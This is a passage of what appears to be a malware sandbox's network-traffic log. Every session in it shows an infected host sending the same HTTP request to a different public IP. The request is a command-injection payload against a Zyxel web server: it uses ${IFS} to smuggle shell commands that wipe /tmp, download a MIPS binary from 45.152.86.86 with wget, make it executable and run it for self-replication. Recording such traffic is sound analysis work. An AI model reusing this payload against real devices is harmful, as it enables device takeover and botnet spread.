                                        Mar 31, 2024 09:21:49.228899002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6006192.168.2.2357612130.89.30.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.228970051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6007192.168.2.2352662117.53.245.160443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.229039907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6008192.168.2.234499420.111.183.106443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.229095936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6009192.168.2.2351666176.170.170.46443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.229193926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6010192.168.2.2346988188.110.236.49443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.229249954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6011192.168.2.2350124116.198.157.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.229305983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6012192.168.2.236087424.15.106.34443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.229371071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6013192.168.2.2349704137.138.248.34443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.229458094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6014192.168.2.2338750155.226.54.153443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.229513884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6015192.168.2.234827260.41.242.108443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.229578972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6016192.168.2.2336650111.118.209.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.229629040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6017192.168.2.2345280118.68.106.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.229723930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6018192.168.2.235124631.97.86.38443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.229772091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6019192.168.2.2353874142.114.221.44443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.229837894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6020192.168.2.2360496123.209.69.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.229892015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6021192.168.2.2342076189.227.202.14443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.229964018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6022192.168.2.233567895.57.215.23443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.230043888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6023192.168.2.233869491.172.39.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.230112076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6024192.168.2.2350418132.147.106.31443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.230182886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6025192.168.2.2336818220.159.254.47443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.230233908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6026192.168.2.2345812165.58.252.0443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.230340958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6027192.168.2.2333000167.83.86.73443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.230407000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6028192.168.2.234276290.48.40.232443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.230464935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6029192.168.2.235127871.188.221.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.230550051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6030192.168.2.235180637.102.156.232443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.230592012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6031192.168.2.235852690.97.216.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.230674982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6032192.168.2.2354916183.253.144.85443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.230755091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6033192.168.2.2355636161.220.31.183443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.230788946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6034192.168.2.236029875.46.145.247443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.230882883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6035192.168.2.233560661.135.154.92443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.230945110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6036192.168.2.2336248138.103.58.209443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.231017113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6037192.168.2.2358826189.125.110.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.231074095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6038192.168.2.234018018.48.168.149443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.231134892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6039192.168.2.2336052194.102.59.97443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.231223106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6040192.168.2.2351330137.11.51.100443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.231259108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6041192.168.2.2351278188.21.122.50443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.231328964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6042192.168.2.2336976111.118.71.17443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.231396914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6043192.168.2.233362866.132.241.154443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.231456995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6044192.168.2.2355880185.197.124.0443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.231549978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6045192.168.2.235606687.86.159.172443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.231622934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6046192.168.2.233594489.229.15.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.231697083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6047192.168.2.2356056197.3.118.18443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.242084980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6048192.168.2.2341358132.85.83.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.242130995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6049192.168.2.234268896.176.172.250443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.242213964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6050192.168.2.234122831.53.168.107443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.242271900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6051192.168.2.235468075.195.139.141443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.242326975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6052192.168.2.2343660170.112.94.150443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.242384911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6053192.168.2.2349406216.195.218.31443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.242458105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6054192.168.2.2355822158.111.193.234443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.242517948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6055192.168.2.2335750165.95.10.77443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.242602110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6056192.168.2.2350000218.154.153.186443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.242650032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6057192.168.2.234832865.54.142.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.242728949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6058192.168.2.2343686216.2.73.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.242784977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6059192.168.2.2336254166.96.47.210443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.242855072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6060192.168.2.234924423.96.166.111443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.242923975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6061192.168.2.2360464165.16.106.123443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.243007898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6062192.168.2.234820863.210.181.144443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.243094921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6063192.168.2.2340096119.253.225.223443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.243139982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6064192.168.2.234653290.184.187.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:50.249413967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6065192.168.2.2350984161.173.93.114443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:51.260289907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6066192.168.2.234796696.167.189.209443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:51.260330915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6067192.168.2.236090094.185.142.165443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:51.260373116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6068192.168.2.2346718181.185.52.135443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:51.260427952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6069192.168.2.2343144143.15.165.14443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:51.260431051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6070192.168.2.234266260.4.202.11443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:51.260518074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6071192.168.2.2335822131.179.215.30443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:51.260574102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6072192.168.2.2351278125.68.37.139443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:51.260622978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6073192.168.2.234449871.189.221.16443
                                        TimestampBytes transferredDirectionData
